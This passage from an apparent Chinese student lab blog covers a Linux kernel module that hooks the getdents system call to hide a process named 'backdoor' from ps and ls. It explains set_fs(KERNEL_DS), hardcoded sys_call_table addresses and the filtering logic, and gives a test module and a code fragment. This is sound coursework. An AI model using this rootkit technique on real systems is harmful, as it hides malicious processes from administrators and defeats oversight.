typedef long long __kernel_loff_t;


19 filp_open()函數,O_RDONLY,vsf_read(fp, buf1, 64, &pos)

在 include/linux/fs.h 中定義以下,參考:https://elixir.bootlin.com/linux/v4.10.17/source/include/linux/fs.h#L2309

extern struct file *filp_open(const char *, int, umode_t);

umod_t 在 include/linux/types.h 中定義以下,參考:https://elixir.bootlin.com/linux/v4.10.17/source/include/linux/types.h#L18

typedef unsigned short umode_t;

O_RDONLY 在 include/uapi/asm-generic/fcntl.h 中聲明以下,參考:https://elixir.bootlin.com/linux/v4.10.17/source/include/uapi/asm-generic/fcntl.h#L19

#define O_ACCMODE   00000003
#define O_RDONLY    00000000
#define O_WRONLY    00000001
#define O_RDWR      00000002

strcut file* filp_open(const char* filename, int open_mode, int mode);
該函數返回strcut file*結構指針,供後繼函數操做使用,該返回值用IS_ERR()來檢驗其有效性;

  • filename:代表要打開或建立文件的名稱(包括路徑部分)。在內核中打開的文件時須要注意打開的時機,很容易出現須要打開文件的驅動很早就加載並打開文件,但須要打開的文件所在設備尚未掛載到文件系統中,而致使打開失敗;
  • open_mode:文件的打開方式,其取值與標準庫中的open相應參數相似,能夠取O_CREAT,O_RDWR,O_RDONLY等;
  • mode:建立文件時使用,設置建立文件的讀寫權限,其它狀況能夠匆略設爲0;

kernel中文件的讀寫操做可使用vfs_read()和vfs_write,vfs_read() vfs_write()兩函數的原形以下:
ssize_t vfs_read(struct file* filp, char __user* buffer, size_t len, loff_t* pos);
ssize_t vfs_write(struct file* filp, const char __user* buffer, size_t len, loff_t* pos);
2)要使這兩個讀寫函數使用kernel空間的buffer指針也能正確工做,須要使用set_fs()函數或宏(set_fs()多是宏定義),若是爲函數,其原形如:void set_fs(mm_segment_t fs); 該函數的做用是改變kernel對內存地址檢查的處理方式,其實該函數的參數fs只有兩個取值:USER_DS,KERNEL_DS,分別表明用戶空間和內核空間,默認狀況下,kernel取值爲USER_DS,即對用戶空間地址檢查並作變換。那麼要在這種對內存地址作檢查變換的函數中使用內核空間地址,就須要使用set_fs(KERNEL_DS)進行設置。get_fs()通常也多是宏定義,它的做用是取得當前的設置,這兩個函數的通常用法爲:

mm_segment_t old_fs;
old_fs = get_fs();
...... //與內存有關的操做

還有一些其它的內核函數也有用__user修飾的參數,在kernel中須要用kernel空間的內存代替時,均可以使用相似辦法。使用vfs_read()和vfs_write()最後須要注意的一點是最後的參數loff_t * pos,pos所指向的值要初始化,代表從文件的什麼地方開始讀寫。

int filp_close(struct file*filp, fl_owner_t id);


20 mm_segment_t 的含義,get_fs() 什麼意思?set_fs(KERNEL_DS),set_fs(fs) 什麼意思?

在 arch/avr32/include/asm/uaccess.h 中定義以下:https://elixir.bootlin.com/linux/v4.10.17/source/arch/avr32/include/asm/uaccess.h#L19

 1 typedef struct {
 2     unsigned int is_user_space;
 3 } mm_segment_t;
 5 /*
 6 * The fs value determines whether argument validity checking should be
 7 * performed or not.  If get_fs() == USER_DS, checking is performed, with
 8 * get_fs() == KERNEL_DS, checking is bypassed.
 9 *
10 * For historical reasons (Data Segment Register?), these macros are misnamed.
11 */
12 #define MAKE_MM_SEG(s)  ((mm_segment_t) { (s) })
13 #define segment_eq(a, b)    ((a).is_user_space == (b).is_user_space)
15 #define USER_ADDR_LIMIT 0x80000000
17 #define KERNEL_DS   MAKE_MM_SEG(0)
18 #define USER_DS     MAKE_MM_SEG(1)
20 #define get_ds()    (KERNEL_DS)
22 static inline mm_segment_t get_fs(void)
23 {
24     return MAKE_MM_SEG(test_thread_flag(TIF_USERSPACE));
25 }
27 static inline void set_fs(mm_segment_t s)
28 {
29     if (s.is_user_space)
30         set_thread_flag(TIF_USERSPACE);
31     else
32         clear_thread_flag(TIF_USERSPACE);
33 }
View Code

1)fs值決定是否應該進行參數有效性檢查執行與否。若是get_fs() == USER_DS,則執行檢測,若get_fs() == KERNEL_DS,則檢查被繞過。
3)系統調用原本是提供給用戶空間的程序訪問的,因此對傳遞給它的參數(好比上面的buf),它默認會認爲來自用戶空間,在->write()函數中, 爲了保護內核空間,通常會用get_fs()獲得的值來和USER_DS進行比較,從而防止用戶空間程序「蓄意」破壞內核空間;
4)而如今要在內核空間使用系統調用,此時傳遞給->write()的參數地址就是內核空間的地址了,在USER_DS之上(USER_DS ~ KERNEL_DS),若是不作任何其它處理,在write()函數中,會認爲該地址超過了USER_DS範圍,因此會認爲是用戶空間的「蓄意破壞」,從而不容許進一步的執行。

參考: linux內核中操做文件的方法--使用get_fs()和set_fs(KERNEL_DS)

21 memmove()和memcpy()有什麼區別?


#include <string.h>
void *memmove(void *dest, const void *src, size_t n);

The memmove() function copies n bytes from memory area src to memory area dest. The memory areas may overlap: copying takes place as though the bytes in src are first copied into a temporary array that does not overlap src or dest, and the bytes are then copied from the temporary array to dest.


#include <string.h>
void *memcpy(void *dest, const void *src, size_t n);

The memcpy() function copies n bytes from memory area src to memory area dest. The memory areas must not overlap. Use memmove(3) if the memory areas do overlap.

22 dup()、dup2()函數

dup 和 dup2 均可以用來複制一個現存的文件描述符。常常用來從新定向進程的 STDIN,STDOUT,STDERR。定義在 <unistd.h>中;
1)int dup(int filedes) ;
函數返回一個新的描述符,這個新的描述符是傳給它的描述符的拷貝,若出錯則返回 -1。由dup返回的新文件描述符必定是當前可用文件描述符中的最小數值。這函數返回的新文件描述符與參數 filedes 共享同一個文件數據結構。
2)int dup2(int filedes, int filedes2);
一樣,函數返回一個新的文件描述符,若出錯則返回 -1。與 dup 不一樣的是,dup2 能夠用 filedes2 參數指定新描述符的數值。若是 filedes2 已經打開,則先將其關閉。如若 filedes 等於 filedes2 , 則 dup2 返回 filedes2 , 而不關閉它。一樣,返回的新文件描述符與參數 filedes 共享同一個文件數據結構。

23 爲何最後修改的是系統調用 sys_call_table[__NR_getdents]?

Linux 系統調用表中,getdents 的含義:讀取目錄項

在 arch/alpha/include/uapi/asm/unistd.h 中,__NR_getdents 定義以下,參考:https://elixir.bootlin.com/linux/v4.10.17/source/arch/alpha/include/uapi/asm/unistd.h#L266

#define __NR_getdents 305

查看 ls 命令源碼,發現其內部是調用了 readdir 函數,而 readdir 是 glibc 的封裝函數,glibc 內部調用的是 getdents 系統調用;
下面是 ls 源碼的一部分:

 1 while( (direntp = readdir(dir)) != NULL)
 2 {
 3     if(-1 == stat(direntp->d_name,&st))
 4         continue;
 5     if((!(flags & STAT_ALL_INFO)) && (direntp->d_name[0] == '.') )
 6         continue;
 7     AddnNode(head,direntp->d_name,&st);
 8     if(S_ISDIR(st.st_mode) && (flags&STAT_RECUR) && strcmp(".",direntp->d_name)&&strcmp( direntp->d_name,".."))
 9     {
10         nNode *newhead=NULL;
11         do_ls(direntp->d_name,flags,&newhead);
12         printf("%s :\n",direntp->d_name);
13         showfile(newhead,flags);
14         freeNode(newhead);
15     }
16 }
View Code

一樣,查看 ps 命令源碼,發現其內部也是調用了 glibc 的封裝函數 readdir,內部調用的也是 getdents 系統調用;
下面是 ps 源碼的一部分:

1 while((de = readdir(d)) != 0){
2     if(isdigit(de->d_name[0])){
3         int tid = atoi(de->d_name);
4         if(tid == pid) continue;
5         ps_line(pid, tid, namefilter);
6     }
7 }
View Code

因此在設置劫持函數時,直接替換 sys_call_table[__NR_getdents];


24 下面各個頭文件的做用

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/uaccess.h>

  • copy_from_user()
  • copy_to_user()
  • get_fs()
  • set_fs()

#include <linux/slab.h>

  • kfree()
  • kmalloc()

#include <linux/fs.h>

  • filp_open()
  • filp_close()
  • vfs_read()

#include <linux/string.h>

  • strstr()


六 18.04的坑

我覺得我一直會很幸運,直到我遇到了實驗3。在18.04上花了1天時間沒把SCT地址搞出來,內外查了很多資料,仍是沒磕出來。因爲時間比較緊,就沒繼續躺坑了,由於總感受這個坑 它又大又圓又深。老老實實裝了16.04.3的系統,按照那位學長的博客開始DIY。參考資料部分有一些我查過的資料,具體對應哪些問題我筆記上也沒記錄,因此你們要參考可能要費點時間(sorry~(┬_┬))

來看看這個又大又圓的坑,幾乎一樣的代碼(改了個靜態地址而已),在18.0四、16.04.3 上run的結果不同,因此那位學長博客中的代碼在18.04系統下是用不了的。測試代碼以下:

 1 #include <linux/module.h>
 2 #include <linux/kernel.h>
 3 #include <linux/unistd.h>
 5 static unsigned long **sys_call_table;
 7 static int filter_init(void) {
 8     printk("fitler_init\n");
 9     sys_call_table = (void *)0xffffffff81a00240; // Ubuntu 16.04.3 Kernel 4.10.0-28-generic
10     sys_call_table = (void *)0xffffffff81e001e0; // Ubuntu 18.04.2 Kernel 4.18.0-17-generic
11     if (sys_call_table) {
12         printk("sys_call_table = %p\n", sys_call_table);
13     }
14     return 0;
15 }
17 static void filter_exit(void) {
18     printk("fitler_exit\n");
19 }
22 module_init(filter_init);
23 module_exit(filter_exit);
View Code

在 Ubuntu 18.04.2 Kernel 4.18.0-17-generic 上run:

在 Ubuntu 16.04.3 Kernel 4.10.0-28-generic 上run:

我先用命令:sudo cat /boot/System.map-4.10.0-28-generic | grep sys_call_table 拿到SCT的地址(18.04對應System.map-4.18.0-17-generic),而後硬編碼到測試代碼中,發如今16.04.3下能夠正確輸出SCT地址,而在18.04下輸出的是個👻(鬼)。鬼知道 4.8.0-17 內核在內部動了什麼手腳,加了層保護?what ever, good luck


七 參考資料




八 老師可能的提問

1 ps讀的是哪一個目錄下的文件?

2 這個number是指什麼?什麼的長度?

if ((number = (*orig_getdents)(fd, dirp, count)) == 0)
    return 0;

   我:是參數中文件描述符 fd 指向的文件的<dirent>;

3 根據你的實現,來模擬這樣一個場景:

  • ls 和 ps 底層都是調用了系統調用 sys_call_table[__NR_getdents],而咱們代碼中劫持了這個系統調用,因此 ls 命令產生的結果也會被咱們劫持;
  • 當咱們在判斷一個<dirent>是否須要過濾時,會遞進地判斷如下條件:
    • 1)need_filter(char *d_name),傳進來的 d_name 是否是一個PID(即:一串整型數字),若是是的話返回PID的長度,不是的話返回-1,這一步操做在 get_pid_len(char *d_name) 方法中完成;
    • 2)經過(1)的判斷後(pidlen > 0),開始申請所需的空間,若申請失敗,直接跳到out,即:不處理當前<dirent>;
    • 3)若空間申請成功,則會從構造的文件路徑:/proc/2054/status 中讀取文件,並從文件中第一行匹配關鍵字「backdoor」,若成功匹配,則說明當前<dirent>須要過濾,不然不須要過濾;
  • 如今咱們在隨便一個目錄下建立了文件,名爲:2054,走一遍 need_filter(char *d_name) 的流程:
    • 1)ls 命令產生的 d_name 是文件名,因此如今 d_name = "2054",在調用 get_pid_len(char *d_name) 方法時,被誤判爲這是 ps 命令產生的<dirent>,由於傳進來的 d_name 就是一串整型字符(2054),因此會經過檢測,進入到(2)的判斷;
    • 2)申請內存空間不和特定命令掛鉤,而且一般會分配成功,因此進入判斷(3);
    • 3)由於此前已經運行了 backdoor 程序,因此 /proc/2054/status 這個文件是必定存在的;如今根據 ls 命令產生的 d_name 構造出的文件路徑一樣是:/proc/2054/status,程序去讀取這個文件時,發現文件存在,而且從其第一行中匹配到了關鍵字「backdoor」,因此當前<dirent>須要過濾;
  • 這樣一來,運行 ls 命令,是看不到你建立的名爲「2054」的文件的,若是這是個文件夾,那麼這個文件夾自己你看不到,可是你能夠用 cd 命令進入這個文件夾,而後在裏面建立1.txt,此時在該目錄下執行 ls 命令,是能夠看到 1.txt文件的;


1)ps 查看到 backdoor 進程


3)執行 > sudo insmod lcx-pshider.ko 後:

  • 執行 ps 命令,看不到 backdoor進程;
  • 執行 ls 命令,看不到 2423 文件;
  • 執行 cat 2423 卻能夠將 2423 文件的內入打印出來;

4)在當前目錄下建立了目錄:proc/2423,發如今./proc/目錄下執行 ls 命令,看不到 2423 這個目錄,可是能夠經過 cd 命令進入該目錄;

5)一樣的,在/proc/目錄下也找不到 2423 這個進程的目錄:


轉載請說明出處😄 have a good time ~
